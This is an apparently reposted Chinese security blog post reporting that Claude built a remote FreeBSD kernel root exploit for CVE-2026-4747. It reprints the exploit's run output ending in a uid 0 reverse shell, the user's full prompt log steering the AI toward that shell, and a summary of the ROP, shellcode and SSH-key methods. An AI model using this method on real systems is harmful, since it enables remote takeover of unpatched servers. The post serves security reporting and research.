文章总结: 文档记录Claude在8小时内基于CVE-2026-4747漏洞开发出FreeBSD内核远程RootShell利用程序的过程。漏洞利用FreeBSD14.x缺乏KASLR和堆栈保护的弱点,通过ROP链与多轮载荷投递实现权限提升。关键步骤包括环境搭建、绕过保护机制、Shellcode编写及反向连接验证,最终获得uid=0的完整控制权限。 综合评分: 82 文章分类: 漏洞分析,渗透测试,二进制安全,红队,应急响应
【CVE-2026-4747】疯了!Claude 直接写内核 RCE,成功获得 Root Shell!
骨哥说事
2026年4月1日 13:51 上海
| | | — | | 声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。 |
#
#
防走失:https://gugesay.com/
不想错过任何消息?设置星标↓ ↓ ↓
#
时间线
- 2026-03-26: FreeBSD发布了一份关于CVE-2026-4747的安全公告,将漏洞发现归功于 “Nicholas Carlini using Claude, Anthropic”
- 太平洋夏令时 2026-03-29 上午9:45: 我们要求Claude开发一个漏洞利用程序
- 太平洋夏令时 2026-03-29 下午5:00: Claude交付了一个可以工作的漏洞利用程序,能够获得一个root shell
总用时: 约8小时实际时间 用户在此期间离开很久,Claude的实际工作时间约为4小时
Claude实际上使用两种不同的策略编写了两个漏洞利用程序 两个程序都一次成功 看起来是这样的:
python3 exploit.py -t 127.0.0.1 --ip 10.0.2.2 --port 4444
==============================================================
CVE-2026-4747: FreeBSD RPCSEC_GSS Remote Kernel RCE
Stack overflow → ROP → shellcode → uid 0 reverse shell
==============================================================
[*] Starting listener on 0.0.0.0:4444...
[*] Starting listener on 0.0.0.0:4444...
Target: 127.0.0.1:2049
Callback: 10.0.2.2:4444
SPN: nfs/[email protected]
Shellcode: 432 bytes (54 qwords)
Delivery: 15 rounds (1 pmap + 14 write)
[R1/15] pmap_change_prot(BSS, 0x2000, RWX)
[+] BSS is now RWX
[R2/15] write (4 qwords → 0xffffffff8198a800) ✓
[R3/15] write (4 qwords → 0xffffffff8198a820) ✓
[R4/15] write (4 qwords → 0xffffffff8198a840) ✓
[R5/15] write (4 qwords → 0xffffffff8198a860) ✓
[R6/15] write (4 qwords → 0xffffffff8198a880) ✓
[R7/15] write (4 qwords → 0xffffffff8198a8a0) ✓
[R8/15] write (4 qwords → 0xffffffff8198a8c0) ✓
[R9/15] write (4 qwords → 0xffffffff8198a8e0) ✓
[R10/15] write (4 qwords → 0xffffffff8198a900) ✓
[R11/15] write (4 qwords → 0xffffffff8198a920) ✓
[R12/15] write (4 qwords → 0xffffffff8198a940) ✓
[R13/15] write (4 qwords → 0xffffffff8198a960) ✓
[R14/15] write (4 qwords → 0xffffffff8198a980) ✓
[R15/15] write + EXECUTE (2 qwords → 0xffffffff8198a9a0) → JUMP 0xffffffff8198a800
[*] Shellcode delivered and executing.
[*] kproc_create → kern_execve('/bin/sh -c ...')
[*] Reverse shell → 10.0.2.2:4444
[*] Waiting for reverse shell...
[+] Connection from 127.0.0.1:41320
[+] Got shell!
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
文末详见完整的漏洞利用和文章,Claude自己编写了所有内容 以下是我们使用的提示词 (请原谅其中的拼写错误):
1. https://www.freebsd.org/security/advisories/FreeBSD-SA-26:08.rpcsec_gss.asc we want to setup a test env for this vulnerability using docker preferably so the docker files can be copied later for easy repro. password for this vm is x , you should setup a vulnerable version of FreeBSD the latest it mentions and then trigger the vulnerability
2. we want to use docker for this not qemu if possible.. we should still be able to connect and debug it the same i assume
3. why does it need to be QEMU and not docker for this to be a real exploit?
4. no just use QEMU then
5. okay now can you maybe generate an entire RCE exploit for this image ?
6. wait what are you compiling? arent we testing it inside of the Fbsd VM using the actual FBSD module as described in the advisory ?
7. i mean why wouldnt you just install a vulnerable version as mentioned in the advisory
8. okay contoninue to trigger this vuln.
9. what old qemu did you kill? we are using qemu in another session as well. do not kill that Linux qemu.
10. why is it running on 2222 2049 and 1111
11. okay now what about getting RCE.
12. tere is no kaslr so it should be easy
13. install ropgadget or what ever you need ... idk
14. no we dont want to reboot? we want a reverse shell as uid 0 if possible ?
15. okay in ../FBSD-001 there is a different remote exploit that gets a shell.. read it for how they constructed the connect back as uid 0 maybe
16. is the ucred write even needed if the proc is uid0 ? and why dont we get a shell ? or can we demon strait somehow a unpriv non root user that elevates to root? but we still want a shell.. as uid0
17. from a remote context aka the exploit should be executed from outside the vm
18. no just continue to get the remote version working. use gdb and hat ever tools you need.
19. you should do this step by step - for the remote version foucs on triggering then getting PC control then the rop.
20. you need to keep notes of our current status and what you have done to get here. thanks.
21. you should verify everything with gdb if you need etc.
22. 1. Pure ROP — no shellcode needed, but we're stuck on rax→rdi transfer (no gadget exists in this kernel) how are ou searching for rop gadgets?
23. why do we need kdc ?
24. nope that wont work as we cant do that from a remote exploit context without having accss to the shell
25. dont think we can prestage a /tmp/x ..
26. working means a connectback shell as uid0
27. when you get it workng i want a complete writeup of th evuln, the exploit methodology, the ropchain, the overflow, and how to install and setup a vuln target
for testing
28. i want a shell.
29. wait what do you mean increase nfs threadcount i guess we should use defaults here..
30. no just continue to get the remote version working. use gdb and hat ever tools you need.
31. make the writeup better explaining each step of the exploit and why
32. also # SSH tunnel for Kerberos KDC sshpass -p freebsd ssh -L 8888:127.0.0.1:88 -N -f -p 2222 [email protected] is it possible to do without an ssh tunnel ?
33. can you do the forward nstead of ssh tunnel then test the exploit again
34. /tmp/final_exploit hardly looks like the final exploit ...
35. why dont you make a nicer exploit where you can supply a target and cb ip ... and do everything inline in that exploit
36. the rop / shellcode everything ..
37. the writeup feels kind of bare, explain the shellcode as if the reader has never seen FBSD001 also what do you mean the "bruteforce" version?
38. also retest and verify it works
39. update the writeup to tell how to also setup a vulnerable target using vmware for example without a KDC tunnel
40. how can i boot the qemu and test it
41. why is KDC required? and nfsd ?
42. okay you noted this stuff in the writeup?
43. do you have the prompt log ? i want to see the original prompt for this
44. can you give me back all the prompts i entered in this session
Claude的成果
从漏洞公告到获得一个可用的远程root shell Claude需要解决六个不同的问题,值得注意的是FreeBSD让这比在现代Linux内核上实现要容易一些,FreeBSD 14.x没有KASLR (内核地址是固定且可预测的) 并且对整数数组没有堆栈金丝雀保护 (被溢出的缓冲区是 int32_t[])
- 实验环境搭建 启动一个带有NFS Kerberos和易受攻击内核模块的FreeBSD虚拟机 并配置所有设置以使溢出漏洞可以通过网络访问 Claude知道虚拟机需要2个或更多CPU 因为FreeBSD会为每个CPU生成8个NFS线程 而每次攻击会杀死一个线程 这包括设置远程调试 以便Claude可以读取内核崩溃转储
- 多数据包发送 Shellcode无法放入单个数据包中 Claude设计了一个15轮的策略 首先使内核内存可执行 然后在14个数据包中每次写入32字节的shellcode 在私下分享给我们的另一个漏洞利用程序中 Claude使用了不同的策略 将一个公钥写入
.ssh/authorized_keys而不是使用反向shell 这将攻击缩短到了6轮 - 干净地终止线程 每次溢出都会劫持一个NFS内核线程 Claude使用 kthread_exit() 来干净地终止每个线程 以保持服务器存活 进行下一轮攻击
- 偏移量调试 从反汇编获得的初始堆栈偏移量是错误的 Claude发送了德布劳因模式 (这是一种常见技术 但在阅读报告前我们没听说过这个术语) 读取崩溃转储 并修正了偏移量
- 内核态到用户态的转换 NFS线程无法运行用户态程序 Claude通过
kproc_create()创建了一个新进程 使用kern_execve()将其进程映像替换为/bin/sh并清除了P_KPROC标志 以便该进程可以切换到用户模式 - 硬件断点错误 子进程不断因调试异常而崩溃 Claude追踪发现这是从DDB继承的陈旧调试寄存器导致的 通过在 fork 之前清除 DR7 寄存器修复了此问题
结论
计算机一直能够发现软件中的漏洞 像AFL和syzkaller这样的模糊测试工具发现内核漏洞已有十多年了 但发现漏洞和利用漏洞是两件非常不同的事情 漏洞开发需要理解操作系统内部机制 精心构建ROP链 管理内存布局 调试崩溃 并在出现问题时进行调整 长期以来 这被认为是只有人类才能跨越的领域
每一项新的人工智能能力出现时,通常伴随着“人工智能可以做Y,但只有人类才能做X”的说法 那么,对于X = 漏洞开发来说,这条界线已经开始被悄悄移动了…
原文:https://blog.calif.io/p/mad-bugs-claude-wrote-a-full-freebsd
exploit:https://github.com/califio/publications/blob/main/MADBugs/CVE-2026-4747/exploit.py
write-up:https://github.com/califio/publications/blob/main/MADBugs/CVE-2026-4747/write-up.md
感谢阅读,如果觉得还不错的话,动动手指给个三连吧~
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:骨哥说事 《【CVE-2026-4747】疯了!Claude 直接写内核 RCE,成功获得 Root Shell!》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论